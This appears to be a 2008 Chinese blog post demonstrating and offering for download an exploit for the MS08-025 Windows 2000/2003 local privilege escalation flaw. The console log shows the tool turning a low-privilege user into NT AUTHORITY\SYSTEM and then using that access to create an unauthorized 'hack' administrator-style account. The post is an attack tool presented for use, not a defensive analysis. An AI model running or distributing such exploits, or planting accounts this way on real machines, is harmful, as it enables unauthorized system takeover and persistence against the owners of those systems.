技术内幕 订阅所有技术内幕的日志

MS08-025 for 2k & 2k3 Local Privilege Escalation

作者:无心 日期:2008-04-22

字体大小:
Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)

D:\>whoami
BAICKER-VMWARE\009

D:\>net user hack /add
系统发生 5 错误。

拒绝访问。


D:\>ms08025 whoami

        MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
        By 009, baicker@hotmail.com
        TEST OS: WINDOWS 2k3 CN SP1

Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8

[+] Executing Shellcode...
NT AUTHORITY\SYSTEM

D:\>ms08025 "net user hack /add"

        MS08-025 Windows Local Privilege Escalation Vulnerability Exploit
        By 009, baicker@hotmail.com
        TEST OS: WINDOWS 2k3 CN SP1

Kernel is \WINNT\System32\ntoskrnl.exe
Get KernelBase Success, ntoskrnl.exe base = 80400000
Mapping ntoskrnl.exe ... ok
KeServiceDescriptorTable = 008ED280
Find KiServiceTable ... Get ZwVdmControl Number ... ok!
ZwVdmControl Call Number: 000000E8
HookAddress: 80473CB8

[+] Executing Shellcode...

D:\>命令成功完成。


D:\>net user

\\BAICKER-VMWARE 的用户帐户

-------------------------------------------------------------------------------
009                      Administrator            Guest
hack                     IUSR_BAICKER-VMWARE      IWAM_BAICKER-VMWARE
TsInternetUser
命令成功完成。


D:\>

下载文件 点击下载此文件



文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: MS08-025 漏洞 本地提权 WINDOWS
评论: 0 | 引用: 0 | 查看次数: 1020
发表评论
昵 称:
密 码: 游客发言不需要密码.
内 容:
验证码: 验证码
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭